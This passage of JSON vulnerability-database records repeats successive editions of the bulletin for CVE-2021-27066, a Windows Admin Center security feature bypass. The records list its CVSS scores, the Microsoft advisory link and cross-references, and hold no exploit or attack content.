"impactScore": 2.9, "obtainAllPrivilege": false, "obtainOtherPrivilege": false, "obtainUserPrivilege": false, "severity": "MEDIUM", "userInteractionRequired": false}, "cvss3": {"cvssV3": {"attackComplexity": "LOW", "attackVector": "NETWORK", "availabilityImpact": "NONE", "baseScore": 4.3, "baseSeverity": "MEDIUM", "confidentialityImpact": "LOW", "integrityImpact": "NONE", "privilegesRequired": "LOW", "scope": "UNCHANGED", "userInteraction": "NONE", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:L/I:N/A:N", "version": "3.1"}, "exploitabilityScore": 2.8, "impactScore": 1.4}, "href": "https://msrc.microsoft.com/update-guide/en-US/vulnerability/CVE-2021-27066", "reporter": "Microsoft", "references": [], "cvelist": ["CVE-2021-27066"], "immutableFields": [], "lastseen": "2021-09-06T18:43:48", "history": [], "viewCount": 7, "enchantments": {"dependencies": {"references": [{"type": "cve", "idList": ["CVE-2021-27066"]}, {"type": "nessus", "idList": ["WINDOWS_ADMIN_CENTER_MS21_MAR.NASL"]}, {"type": "kaspersky", "idList": ["KLA12111"]}, {"type": "rapid7blog", "idList": ["RAPID7BLOG:88A83067D8D3C5AEBAF1B793818EEE53"]}], "modified": "2021-09-06T18:43:48", "rev": 2}, "score": {"value": 5.8, "vector": "NONE", "modified": "2021-09-06T18:43:48", "rev": 2}}, "objectVersion": "1.6", "kbList": ["KBRelease Notes"], "msrc": "", "mscve": "CVE-2021-27066", "msAffectedSoftware": [{"name": "Windows Admin Center", "kbSupersedence": "", "kb": "KBRelease Notes", "msplatform": ""}], "vendorCvss": {}}, "lastseen": "2021-09-06T18:43:48", "differentElements": ["msAffectedSoftware"], "edition": 33}, {"bulletin": {"id": "MS:CVE-2021-27066", "hash": "3658a9de69169c8131cdc7d2cd2a9cfb", "type": "mscve", "bulletinFamily": "microsoft", "title": "Windows Admin Center Security Feature Bypass Vulnerability", "description": "Windows Admin Center Security Feature Bypass Vulnerability \n", "published": "2021-03-09T08:00:00", "modified": "2021-03-09T08:00:00", "cvss": {"score": 4.0, "vector": "AV:N/AC:L/Au:S/C:P/I:N/A:N"}, "cvss2": {"acInsufInfo": false, "cvssV2": {"accessComplexity": "LOW", "accessVector": "NETWORK", "authentication": "SINGLE", "availabilityImpact": "NONE", "baseScore": 4.0, "confidentialityImpact": "PARTIAL", "integrityImpact": "NONE", "vectorString": "AV:N/AC:L/Au:S/C:P/I:N/A:N", "version": "2.0"}, "exploitabilityScore": 8.0, "impactScore": 2.9, "obtainAllPrivilege": false, "obtainOtherPrivilege": false, "obtainUserPrivilege": false, "severity": "MEDIUM", "userInteractionRequired": false}, "cvss3": {"cvssV3": {"attackComplexity": "LOW", "attackVector": "NETWORK", "availabilityImpact": "NONE", "baseScore": 4.3, "baseSeverity": "MEDIUM", "confidentialityImpact": "LOW", "integrityImpact": "NONE", "privilegesRequired": "LOW", "scope": "UNCHANGED", "userInteraction": "NONE", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:L/I:N/A:N", "version": "3.1"}, "exploitabilityScore": 2.8, "impactScore": 1.4}, "href": "https://msrc.microsoft.com/update-guide/en-US/vulnerability/CVE-2021-27066", "reporter": "Microsoft", "references": [], "cvelist": ["CVE-2021-27066"], "immutableFields": [], "lastseen": "2021-09-07T08:42:15", "history": [], "viewCount": 7, "enchantments": {"dependencies": {"references": [{"type": "cve", "idList": ["CVE-2021-27066"]}, {"type": "nessus", "idList": ["WINDOWS_ADMIN_CENTER_MS21_MAR.NASL"]}, {"type": "kaspersky", "idList": ["KLA12111"]}, {"type": "rapid7blog", "idList": ["RAPID7BLOG:88A83067D8D3C5AEBAF1B793818EEE53"]}], "modified": "2021-09-07T08:42:15", "rev": 2}, "score": {"value": 5.8, "vector": "NONE", "modified": "2021-09-07T08:42:15", "rev": 2}}, "objectVersion": "1.6", "kbList": ["KBRelease Notes"], "msrc": "", "mscve": "CVE-2021-27066", "msAffectedSoftware": [{"name": "Windows Admin Center", "kbSupersedence": "", "kb": "KBRelease Notes", "msplatform": ""}, {"name": "Windows Admin Center", "kbSupersedence": "", "kb": "KBRelease Notes", "msplatform": ""}], "vendorCvss": {}}, "lastseen": "2021-09-07T08:42:15", "differentElements": ["msAffectedSoftware"], "edition": 34}, {"bulletin": {"id": "MS:CVE-2021-27066", "hash": "3c029ffeade3d3a98dc989d14961ebb1", "type": "mscve", "bulletinFamily": "microsoft", "title": "Windows Admin Center Security Feature Bypass Vulnerability", "description": "Windows Admin Center Security Feature Bypass Vulnerability \n", "published": "2021-03-09T08:00:00", "modified": "2021-03-09T08:00:00", "cvss": {"score": 4.0, "vector": "AV:N/AC:L/Au:S/C:P/I:N/A:N"}, "cvss2": {"acInsufInfo": false, "cvssV2": {"accessComplexity": "LOW", "accessVector": "NETWORK", "authentication": "SINGLE", "availabilityImpact": "NONE", "baseScore": 4.0, "confidentialityImpact": "PARTIAL", "integrityImpact": "NONE", "vectorString": "AV:N/AC:L/Au:S/C:P/I:N/A:N", "version": "2.0"}, "exploitabilityScore": 8.0, "impactScore": 2.9, "obtainAllPrivilege": false, "obtainOtherPrivilege": false, "obtainUserPrivilege": false, "severity": "MEDIUM", "userInteractionRequired": false}, "cvss3": {"cvssV3": {"attackComplexity": "LOW", "attackVector": "NETWORK", "availabilityImpact": "NONE", "baseScore": 4.3, "baseSeverity": "MEDIUM", "confidentialityImpact": "LOW", "integrityImpact": "NONE", "privilegesRequired": "LOW", "scope": "UNCHANGED", "userInteraction": "NONE", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:L/I:N/A:N", "version": "3.1"}, "exploitabilityScore": 2.8, "impactScore": 1.4}, "href": "https://msrc.microsoft.com/update-guide/en-US/vulnerability/CVE-2021-27066", "reporter": "Microsoft", "references": [], "cvelist": ["CVE-2021-27066"], "immutableFields": [], "lastseen": "2021-09-07T10:43:29", "history": [], "viewCount": 7, "enchantments": {"dependencies": {"references": [{"type": "cve", "idList": ["CVE-2021-27066"]}, {"type": "nessus", "idList": ["WINDOWS_ADMIN_CENTER_MS21_MAR.NASL"]}, {"type": "kaspersky", "idList": ["KLA12111"]}, {"type": "rapid7blog", "idList": ["RAPID7BLOG:88A83067D8D3C5AEBAF1B793818EEE53"]}], "modified": "2021-09-07T10:43:29", "rev": 2}, "score": {"value": 5.8, "vector": "NONE", "modified": "2021-09-07T10:43:29", "rev": 2}}, "objectVersion": "1.6", "kbList": ["KBRelease Notes"], "msrc": "", "mscve": "CVE-2021-27066", "msAffectedSoftware": [{"name": "Windows Admin Center", "kbSupersedence": "", "kb": "KBRelease Notes", "msplatform": ""}], "vendorCvss": {}}, "lastseen": "2021-09-07T10:43:29", "differentElements": ["msAffectedSoftware"], "edition": 35}, {"bulletin": {"id": "MS:CVE-2021-27066", "hash": "3658a9de69169c8131cdc7d2cd2a9cfb", "type": "mscve", "bulletinFamily": "microsoft", "title": "Windows Admin Center Security Feature Bypass Vulnerability", "description": "Windows Admin Center Security Feature Bypass Vulnerability \n", "published": "2021-03-09T08:00:00", "modified": "2021-03-09T08:00:00", "cvss": {"score": 4.0, "vector": "AV:N/AC:L/Au:S/C:P/I:N/A:N"}, "cvss2": {"acInsufInfo": false, "cvssV2": {"accessComplexity": "LOW", "accessVector": "NETWORK", "authentication": "SINGLE", "availabilityImpact": "NONE", "baseScore": 4.0, "confidentialityImpact": "PARTIAL", "integrityImpact": "NONE", "vectorString": "AV:N/AC:L/Au:S/C:P/I:N/A:N", "version": "2.0"}, "exploitabilityScore": 8.0, "impactScore": 2.9, "obtainAllPrivilege": false, "obtainOtherPrivilege": false, "obtainUserPrivilege": false, "severity": "MEDIUM", "userInteractionRequired": false}, "cvss3": {"cvssV3": {"attackComplexity": "LOW", "attackVector": "NETWORK", "availabilityImpact": "NONE", "baseScore": 4.3, "baseSeverity": "MEDIUM", "confidentialityImpact": "LOW", "integrityImpact": "NONE", "privilegesRequired": "LOW", "scope": "UNCHANGED", "userInteraction": "NONE", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:L/I:N/A:N", "version": "3.1"}, "exploitabilityScore": 2.8, "impactScore": 1.4}, "href": "https://msrc.microsoft.com/update-guide/en-US/vulnerability/CVE-2021-27066", "reporter": "Microsoft", "references": [], "cvelist": ["CVE-2021-27066"], "immutableFields": [], "lastseen": "2021-09-08T14:43:49", "history": [], "viewCount": 7, "enchantments": {"dependencies": {"references": [{"type": "cve", "idList": ["CVE-2021-27066"]}, {"type": "nessus", "idList": ["WINDOWS_ADMIN_CENTER_MS21_MAR.NASL"]}, {"type": "kaspersky", "idList": ["KLA12111"]}, {"type": "rapid7blog", "idList": ["RAPID7BLOG:88A83067D8D3C5AEBAF1B793818EEE53"]}], "modified": "2021-09-08T14:43:49", "rev": 2}, "score": {"value": 5.8, "vector": "NONE", "modified": "2021-09-08T14:43:49", "rev": 2}}, "objectVersion": "1.6", "kbList": ["KBRelease Notes"], "msrc": "", "mscve": "CVE-2021-27066", "msAffectedSoftware": [{"name": "Windows Admin Center", "kbSupersedence": "", "kb": "KBRelease Notes", "msplatform": ""}, {"name": "Windows Admin Center", "kbSupersedence": "", "kb": "KBRelease Notes", "msplatform": ""}], "vendorCvss": {}}, "lastseen": "2021-09-08T14:43:49", "differentElements": ["msAffectedSoftware"], "edition": 36}, {"bulletin": {"id": "MS:CVE-2021-27066", "hash": "3c029ffeade3d3a98dc989d14961ebb1", "type": "mscve", "bulletinFamily": "microsoft", "title": "Windows Admin Center Security Feature Bypass Vulnerability", "description": "Windows Admin Center Security Feature Bypass Vulnerability \n", "published": "2021-03-09T08:00:00", "modified": "2021-03-09T08:00:00", "cvss": {"score": 4.0, "vector": "AV:N/AC:L/Au:S/C:P/I:N/A:N"}, "cvss2": {"acInsufInfo": false, "cvssV2": {"accessComplexity": "LOW", "accessVector": "NETWORK", "authentication": "SINGLE", "availabilityImpact": "NONE", "baseScore": 4.0, "confidentialityImpact": "PARTIAL", "integrityImpact": "NONE", "vectorString": "AV:N/AC:L/Au:S/C:P/I:N/A:N", "version": "2.0"}, "exploitabilityScore": 8.0, "impactScore": 2.9, "obtainAllPrivilege": false, "obtainOtherPrivilege": false, "obtainUserPrivilege": false, "severity": "MEDIUM", "userInteractionRequired": false}, "cvss3": {"cvssV3": {"attackComplexity": "LOW", "attackVector": "NETWORK", "availabilityImpact": "NONE", "baseScore": 4.3, "baseSeverity": "MEDIUM", "confidentialityImpact": "LOW", "integrityImpact": "NONE", "privilegesRequired": "LOW", "scope": "UNCHANGED", "userInteraction": "NONE", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:L/I:N/A:N", "version": "3.1"}, "exploitabilityScore": 2.8, "impactScore": 1.4}, "href": "https://msrc.microsoft.com/update-guide/en-US/vulnerability/CVE-2021-27066", "reporter": "Microsoft", "references": [], "cvelist": ["CVE-2021-27066"], "immutableFields": [], "lastseen": "2021-09-08T16:53:54", "history": [], "viewCount": 7, "enchantments": {"dependencies": {"references": [{"type": "cve", "idList": ["CVE-2021-27066"]}, {"type": "nessus", "idList": ["WINDOWS_ADMIN_CENTER_MS21_MAR.NASL"]}, {"type": "kaspersky", "idList": ["KLA12111"]}, {"type": "rapid7blog", "idList": ["RAPID7BLOG:88A83067D8D3C5AEBAF1B793818EEE53"]}], "modified": "2021-09-08T16:53:54", "rev": 2}, "score": {"value": 5.8, "vector": "NONE", "modified": "2021-09-08T16:53:54", "rev": 2}}, "objectVersion": "1.6", "kbList": ["KBRelease Notes"], "msrc": "", "mscve": "CVE-2021-27066", "msAffectedSoftware": [{"name": "Windows Admin Center", "kbSupersedence": "", "kb": "KBRelease Notes", "msplatform": ""}], "vendorCvss": {}}, "lastseen": "2021-09-08T16:53:54", "differentElements": ["msAffectedSoftware"], "edition": 37}, {"bulletin": {"id": "MS:CVE-2021-27066", "hash": "3658a9de69169c8131cdc7d2cd2a9cfb", "type": "mscve", "bulletinFamily": "microsoft", "title": "Windows Admin Center Security Feature Bypass Vulnerability", "description": "Windows Admin Center Security Feature Bypass Vulnerability \n", "published": "2021-03-09T08:00:00", "modified": "2021-03-09T08:00:00", "cvss": {"score": 4.0, "vector": "AV:N/AC:L/Au:S/C:P/I:N/A:N"}, "cvss2": {"acInsufInfo": false, "cvssV2": {"accessComplexity": "LOW", "accessVector": "NETWORK", "authentication": "SINGLE", "availabilityImpact": "NONE", "baseScore": 4.0, "confidentialityImpact": "PARTIAL", "integrityImpact": "NONE", "vectorString": "AV:N/AC:L/Au:S/C:P/I:N/A:N", "version": "2.0"}, "exploitabilityScore": 8.0, "impactScore": 2.9, "obtainAllPrivilege": false, "obtainOtherPrivilege": false, "obtainUserPrivilege": false, "severity": "MEDIUM", "userInteractionRequired": false}, "cvss3": {"cvssV3": {"attackComplexity": "LOW", "attackVector": "NETWORK", "availabilityImpact": "NONE", "baseScore": 4.3, "baseSeverity": "MEDIUM", "confidentialityImpact": "LOW", "integrityImpact": "NONE", "privilegesRequired": "LOW", "scope": "UNCHANGED", "userInteraction": "NONE", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:L/I:N/A:N", "version": "3.1"}, "exploitabilityScore": 2.8, "impactScore": 1.4}, "href": "https://msrc.microsoft.com/update-guide/en-US/vulnerability/CVE-2021-27066", "reporter": "Microsoft", "references": [], "cvelist": ["CVE-2021-27066"], "immutableFields": [], "lastseen": "2021-09-09T04:59:48", "history": [], "viewCount": 7, "enchantments": {"dependencies": {"references": [{"type": "cve", "idList": ["CVE-2021-27066"]}, {"type": "nessus", "idList": ["WINDOWS_ADMIN_CENTER_MS21_MAR.NASL"]}, {"type": "kaspersky", "idList": ["KLA12111"]}, {"type": "rapid7blog", "idList": ["RAPID7BLOG:88A83067D8D3C5AEBAF1B793818EEE53"]}], "modified": "2021-09-08T16:53:54", "rev": 2}, "score": {"value": 5.8, "vector": "NONE", "modified": "2021-09-08T16:53:54", "rev": 2}}, "objectVersion": "1.6", "kbList": ["KBRelease Notes"], "msrc": "", "mscve": "CVE-2021-27066", "msAffectedSoftware": [{"name": "Windows Admin Center", "kbSupersedence": "", "kb": "KBRelease Notes", "msplatform": ""}, {"name": "Windows Admin Center", "kbSupersedence": "", "kb": "KBRelease Notes", "msplatform": ""}], "vendorCvss": {}}, "lastseen": "2021-09-09T04:59:48", "differentElements": ["msAffectedSoftware"], "edition": 38}, {"bulletin": {"id": "MS:CVE-2021-27066", "hash": "3c029ffeade3d3a98dc989d14961ebb1", "type": "mscve", "bulletinFamily": "microsoft", "title": "Windows Admin Center Security Feature Bypass Vulnerability", "description": "Windows Admin Center Security Feature Bypass Vulnerability \n", "published": "2021-03-09T08:00:00", "modified": "2021-03-09T08:00:00", "cvss": {"score": 4.0, "vector": "AV:N/AC:L/Au:S/C:P/I:N/A:N"}, "cvss2": {"acInsufInfo": false, "cvssV2": {"accessComplexity": "LOW", "accessVector": "NETWORK", "authentication": "SINGLE", "availabilityImpact": "NONE", "baseScore": 4.0, "confidentialityImpact": "PARTIAL", "integrityImpact": "NONE", "vectorString": "AV:N/AC:L/Au:S/C:P/I:N/A:N", "version": "2.0"}, "exploitabilityScore": 8.0, "impactScore": 2.9, "obtainAllPrivilege": false, "obtainOtherPrivilege": false, "obtainUserPrivilege": false, "severity": "MEDIUM", "userInteractionRequired": false}, "cvss3": {"cvssV3": {"attackComplexity": "LOW", "attackVector": "NETWORK", "availabilityImpact": "NONE", "baseScore": 4.3, "baseSeverity": "MEDIUM", "confidentialityImpact": "LOW", "integrityImpact": "NONE", "privilegesRequired": "LOW", "scope": "UNCHANGED", "userInteraction": "NONE", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:L/I:N/A:N", "version": "3.1"}, "exploitabilityScore": 2.8, "impactScore": 1.4}, "href": "https://msrc.microsoft.com/update-guide/en-US/vulnerability/CVE-2021-27066", "reporter": "Microsoft", "references": [], "cvelist": ["CVE-2021-27066"], "immutableFields": [], "lastseen": "2021-09-09T06:49:09", "history": [], "viewCount": 7, "enchantments": {"dependencies": {"references": [{"type": "cve", "idList": ["CVE-2021-27066"]}, {"type": "nessus", "idList": ["WINDOWS_ADMIN_CENTER_MS21_MAR.NASL"]}, {"type": "kaspersky", "idList": ["KLA12111"]}, {"type": "rapid7blog", "idList": ["RAPID7BLOG:88A83067D8D3C5AEBAF1B793818EEE53"]}], "modified": "2021-09-09T06:49:09", "rev": 2}, "score": {"value": 5.8, "vector": "NONE", "modified": "2021-09-09T06:49:09", "rev": 2}}, "objectVersion": "1.6", "kbList": ["KBRelease Notes"], "msrc": "", "mscve": "CVE-2021-27066", "msAffectedSoftware": [{"name": "Windows Admin Center", "kbSupersedence": "", "kb": "KBRelease Notes", "msplatform": ""}], "vendorCvss": {}}, "lastseen": "2021-09-09T06:49:09", "differentElements": ["msAffectedSoftware"], "edition": 39}, {"bulletin": {"id": "MS:CVE-2021-27066", "hash": "3658a9de69169c8131cdc7d2cd2a9cfb", "type": "mscve", "bulletinFamily": "microsoft", "title": "Windows Admin Center Security Feature Bypass Vulnerability", "description": "Windows Admin Center Security Feature Bypass Vulnerability \n", "published": "2021-03-09T08:00:00", "modified": "2021-03-09T08:00:00", "cvss": {"score": 4.0, "vector": "AV:N/AC:L/Au:S/C:P/I:N/A:N"}, "cvss2": {"acInsufInfo": false, "cvssV2": {"accessComplexity": "LOW", "accessVector": "NETWORK", "authentication": "SINGLE", "availabilityImpact": "NONE", "baseScore": 4.0, "confidentialityImpact": "PARTIAL", "integrityImpact": "NONE", "vectorString": "AV:N/AC:L/Au:S/C:P/I:N/A:N", "version": "2.0"}, "exploitabilityScore": 8.0, "impactScore": 2.9, "obtainAllPrivilege": false, "obtainOtherPrivilege": false, "obtainUserPrivilege": false, "severity": "MEDIUM", "userInteractionRequired": false}, "cvss3": {"cvssV3": {"attackComplexity": "LOW", "attackVector": "NETWORK", "availabilityImpact": "NONE", "baseScore": 4.3, "baseSeverity": "MEDIUM", "confidentialityImpact": "LOW", "integrityImpact": "NONE", "privilegesRequired": "LOW", "scope": "UNCHANGED", "userInteraction": "NONE", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:L/I:N/A:N", "version": "3.1"}, "exploitabilityScore": 2.8, "impactScore": 1.4}, "href": "https://msrc.microsoft.com/update-guide/en-US/vulnerability/CVE-2021-27066", "reporter": "Microsoft", "references": [], "cvelist": ["CVE-2021-27066"], "immutableFields": [], "lastseen": "2021-09-10T08:44:37", "history": [], "viewCount": 7, "enchantments": {"dependencies": {"references": [{"type": "cve", "idList": ["CVE-2021-27066"]}, {"type": "nessus", "idList": ["WINDOWS_ADMIN_CENTER_MS21_MAR.NASL"]}, {"type": "kaspersky", "idList": ["KLA12111"]}, {"type": "rapid7blog", "idList": ["RAPID7BLOG:88A83067D8D3C5AEBAF1B793818EEE53"]}], "modified": "2021-09-09T06:49:09", "rev": 2}, "score": {"value": 5.8, "vector": "NONE", "modified": "2021-09-09T06:49:09", "rev": 2}}, "objectVersion": "1.6", "kbList": ["KBRelease Notes"], "msrc": "", "mscve": "CVE-2021-27066", "msAffectedSoftware": [{"name": "Windows Admin Center", "kbSupersedence": "", "kb": "KBRelease Notes", "msplatform": ""}, {"name": "Windows Admin Center", "kbSupersedence": "", "kb": "KBRelease Notes", "msplatform": ""}], "vendorCvss": {}}, "lastseen": "2021-09-10T08:44:37", "differentElements": ["msAffectedSoftware"], "edition": 40}, {"bulletin": {"id": "MS:CVE-2021-27066", "hash": "3c029ffeade3d3a98dc989d14961ebb1", "type": "mscve", "bulletinFamily": "microsoft", "title": "Windows Admin Center Security Feature Bypass Vulnerability", "description": "Windows Admin Center Security Feature Bypass Vulnerability \n", "published": "2021-03-09T08:00:00", "modified": "2021-03-09T08:00:00", "cvss": {"score": 4.0, "vector": "AV:N/AC:L/Au:S/C:P/I:N/A:N"}, "cvss2": {"acInsufInfo": false, "cvssV2": {"accessComplexity": "LOW", "accessVector": "NETWORK", "authentication": "SINGLE", "availabilityImpact": "NONE", "baseScore": 4.0, "confidentialityImpact": "PARTIAL", "integrityImpact": "NONE", "vectorString": "AV:N/AC:L/Au:S/C:P/I:N/A:N", "version": "2.0"}, "exploitabilityScore": 8.0, "impactScore": 2.9, "obtainAllPrivilege": false, "obtainOtherPrivilege": false, "obtainUserPrivilege": false, "severity": "MEDIUM", "userInteractionRequired": false}, "cvss3": {"cvssV3": {"attackComplexity": "LOW", "attackVector": "NETWORK", "availabilityImpact": "NONE", "baseScore": 4.3, "baseSeverity": "MEDIUM", "confidentialityImpact": "LOW", "integrityImpact": "NONE", "privilegesRequired": "LOW", "scope": "UNCHANGED", "userInteraction": "NONE", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:L/I:N/A:N", "version": "3.1"}, "exploitabilityScore": 2.8, "impactScore": 1.4}, "href": "https://msrc.microsoft.com/update-guide/en-US/vulnerability/CVE-2021-27066", "reporter": "Microsoft", "references": [], "cvelist": ["CVE-2021-27066"], "immutableFields": [], "lastseen": "2021-09-10T10:45:09", "history": [], "viewCount": 7, "enchantments": {"dependencies": {"references": [{"type": "cve", "idList": ["CVE-2021-27066"]}, {"type": "nessus", "idList": ["WINDOWS_ADMIN_CENTER_MS21_MAR.NASL"]}, {"type": "kaspersky", "idList": ["KLA12111"]}, {"type": "rapid7blog", "idList": ["RAPID7BLOG:88A83067D8D3C5AEBAF1B793818EEE53"]}], "modified": "2021-09-09T06:49:09", "rev": 2}, "score": {"value": 5.8, "vector": "NONE", "modified": "2021-09-09T06:49:09", "rev": 2}}, "objectVersion": "1.6", "kbList": ["KBRelease Notes"], "msrc": "", "mscve": "CVE-2021-27066", "msAffectedSoftware": [{"name": "Windows Admin Center", "kbSupersedence": "", "kb": "KBRelease Notes", "msplatform": ""}], "vendorCvss": {}}, "lastseen": "2021-09-10T10:45:09", "differentElements": ["msAffectedSoftware"], "edition": 41}, {"bulletin": {"id": "MS:CVE-2021-27066", "hash": "3658a9de69169c8131cdc7d2cd2a9cfb", "type": "mscve", "bulletinFamily": "microsoft", "title": "Windows Admin Center Security Feature Bypass Vulnerability", "description": "Windows Admin Center Security Feature Bypass Vulnerability \n", "published": "2021-03-09T08:00:00", "modified": "2021-03-09T08:00:00", "cvss": {"score": 4.0, "vector": "AV:N/AC:L/Au:S/C:P/I:N/A:N"}, "cvss2": {"acInsufInfo": false, "cvssV2": {"accessComplexity": "LOW", "accessVector": "NETWORK", "authentication": "SINGLE", "availabilityImpact": "NONE", "baseScore": 4.0, "confidentialityImpact": "PARTIAL", "integrityImpact": "NONE", "vectorString": "AV:N/AC:L/Au:S/C:P/I:N/A:N", "version": "2.0"}, "exploitabilityScore": 8.0, "impactScore": 2.9, "obtainAllPrivilege": false, "obtainOtherPrivilege": false, "obtainUserPrivilege": false, "severity": "MEDIUM", "userInteractionRequired": false}, "cvss3": {"cvssV3": {"attackComplexity": "LOW", "attackVector": "NETWORK", "availabilityImpact": "NONE", "baseScore": 4.3, "baseSeverity": "MEDIUM", "confidentialityImpact": "LOW", "integrityImpact": "NONE", "privilegesRequired": "LOW", "scope": "UNCHANGED", "userInteraction": "NONE", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:L/I:N/A:N", "version": "3.1"}, "exploitabilityScore": 2.8, "impactScore": 1.4}, "href": "https://msrc.microsoft.com/update-guide/en-US/vulnerability/CVE-2021-27066", "reporter": "Microsoft", "references": [], "cvelist": ["CVE-2021-27066"], "immutableFields": [], "lastseen": "2021-09-10T18:55:08", "history": [], "viewCount": 7, "enchantments": {"dependencies": {"references": [{"type": "cve", "idList": ["CVE-2021-27066"]}, {"type": "nessus", "idList": ["WINDOWS_ADMIN_CENTER_MS21_MAR.NASL"]}, {"type": "kaspersky", "idList": ["KLA12111"]}, {"type": "rapid7blog", "idList": ["RAPID7BLOG:88A83067D8D3C5AEBAF1B793818EEE53"]}], "modified": "2021-09-09T06:49:09", "rev": 2}, "score": {"value": 5.8, "vector": "NONE", "modified": "2021-09-09T06:49:09", "rev": 2}}, "objectVersion": "1.6", "kbList": ["KBRelease Notes"], "msrc": "", "mscve": "CVE-2021-27066", "msAffectedSoftware": [{"name": "Windows Admin Center", "kbSupersedence": "", "kb": "KBRelease Notes", "msplatform": ""}, {"name": "Windows Admin Center", "kbSupersedence": "", "kb": "KBRelease Notes", "msplatform": ""}], "vendorCvss": {}}, "lastseen": "2021-09-10T18:55:08", "differentElements": ["msAffectedSoftware"], "edition": 42}, {"bulletin": {"id": "MS:CVE-2021-27066", "hash": "3c029ffeade3d3a98dc989d14961ebb1", "type": "mscve", "bulletinFamily": "microsoft", "title": "Windows Admin Center Security Feature Bypass Vulnerability", "description": "Windows Admin Center Security Feature Bypass Vulnerability \n", "published": "2021-03-09T08:00:00", "modified": "2021-03-09T08:00:00", "cvss": {"score": 4.0, "vector": "AV:N/AC:L/Au:S/C:P/I:N/A:N"}, "cvss2": {"acInsufInfo": false, "cvssV2": {"accessComplexity": "LOW", "accessVector": "NETWORK", "authentication": "SINGLE", "availabilityImpact": "NONE", "baseScore": 4.0, "confidentialityImpact": "PARTIAL", "integrityImpact": "NONE", "vectorString": "AV:N/AC:L/Au:S/C:P/I:N/A:N", "version": "2.0"}, "exploitabilityScore": 8.0, "impactScore": 2.9, "obtainAllPrivilege": false, "obtainOtherPrivilege": false, "obtainUserPrivilege": false, "severity": "MEDIUM", "userInteractionRequired": false}, "cvss3": {"cvssV3": {"attackComplexity": "LOW", "attackVector": "NETWORK", "availabilityImpact": "NONE", "baseScore": 4.3, "baseSeverity": "MEDIUM", "confidentialityImpact": "LOW", "integrityImpact": "NONE", "privilegesRequired": "LOW", "scope": "UNCHANGED", "userInteraction": "NONE", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:L/I:N/A:N", "version": "3.1"}, "exploitabilityScore": 2.8, "impactScore": 1.4}, "href": "https://msrc.microsoft.com/update-guide/en-US/vulnerability/CVE-2021-27066", "reporter": "Microsoft", "references": [], "cvelist": ["CVE-2021-27066"], "immutableFields": [], "lastseen": "2021-09-10T20:43:46", "history": [], "viewCount": 7, "enchantments": {"dependencies": {"references": [{"type": "cve", "idList": ["CVE-2021-27066"]}, {"type": "nessus", "idList": ["WINDOWS_ADMIN_CENTER_MS21_MAR.NASL"]}, {"type": "kaspersky", "idList": ["KLA12111"]}, {"type": "rapid7blog", "idList": ["RAPID7BLOG:88A83067D8D3C5AEBAF1B793818EEE53"]}], "modified": "2021-09-09T06:49:09", "rev": 2}, "score": {"value": 5.8, "vector": "NONE", "modified": "2021-09-09T06:49:09", "rev": 2}}, "objectVersion": "1.6", "kbList": ["KBRelease Notes"], "msrc": "", "mscve": "CVE-2021-27066", "msAffectedSoftware": [{"name": "Windows Admin Center", "kbSupersedence": "", "kb": "KBRelease Notes", "msplatform": ""}], "vendorCvss": {}}, "lastseen": "2021-09-10T20:43:46", "differentElements": ["msAffectedSoftware"], "edition": 43}, {"bulletin": {"id": "MS:CVE-2021-27066", "hash": "3658a9de69169c8131cdc7d2cd2a9cfb", "type": "mscve", "bulletinFamily": "microsoft", "title": "Windows Admin Center Security Feature Bypass Vulnerability", "description": "Windows Admin Center Security Feature Bypass Vulnerability \n", "published": "2021-03-09T08:00:00", "modified": "2021-03-09T08:00:00", "cvss": {"score": 4.0, "vector": "AV:N/AC:L/Au:S/C:P/I:N/A:N"}, "cvss2": {"acInsufInfo": false, "cvssV2": {"accessComplexity": "LOW", "accessVector": "NETWORK", "authentication": "SINGLE", "availabilityImpact": "NONE", "baseScore": 4.0, "confidentialityImpact": "PARTIAL", "integrityImpact": "NONE", "vectorString": "AV:N/AC:L/Au:S/C:P/I:N/A:N", "version": "2.0"}, "exploitabilityScore": 8.0, "impactScore": 2.9, "obtainAllPrivilege": false, "obtainOtherPrivilege": false, "obtainUserPrivilege": false, "severity": "MEDIUM", "userInteractionRequired": false}, "cvss3": {"cvssV3": {"attackComplexity": "LOW", "attackVector": "NETWORK", "availabilityImpact": "NONE", "baseScore": 4.3, "baseSeverity": "MEDIUM", "confidentialityImpact": "LOW", "integrityImpact": "NONE", "privilegesRequired": "LOW", "scope": "UNCHANGED", "userInteraction": "NONE", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:L/I:N/A:N", "version": "3.1"}, "exploitabilityScore": 2.8, "impactScore": 1.4}, "href": "https://msrc.microsoft.com/update-guide/en-US/vulnerability/CVE-2021-27066", "reporter": "Microsoft", "references": [], "cvelist": ["CVE-2021-27066"], "immutableFields": [], "lastseen": "2021-09-11T08:45:23", "history": [], "viewCount": 7, "enchantments": {"dependencies": {"references": [{"type": "cve", "idList": ["CVE-2021-27066"]}, {"type": "nessus", "idList": ["WINDOWS_ADMIN_CENTER_MS21_MAR.NASL"]}, {"type": "kaspersky", "idList": ["KLA12111"]}, {"type": "rapid7blog", "idList": ["RAPID7BLOG:88A83067D8D3C5AEBAF1B793818EEE53"]}], "modified": "2021-09-09T06:49:09", "rev": 2}, "score": {"value": 5.8, "vector": "NONE", "modified": "2021-09-09T06:49:09", "rev": 2}}, "objectVersion": "1.6", "kbList": ["KBRelease Notes"], "msrc": "", "mscve": "CVE-2021-27066", "msAffectedSoftware": [{"name": "Windows Admin Center", "kbSupersedence": "", "kb": "KBRelease Notes", "msplatform": ""}, {"name": "Windows Admin Center", "kbSupersedence": "", "kb": "KBRelease Notes", "msplatform": ""}], "vendorCvss": {}}, "lastseen": "2021-09-11T08:45:23", "differentElements": ["msAffectedSoftware"], "edition": 44}, {"bulletin": {"id": "MS:CVE-2021-27066", "hash": 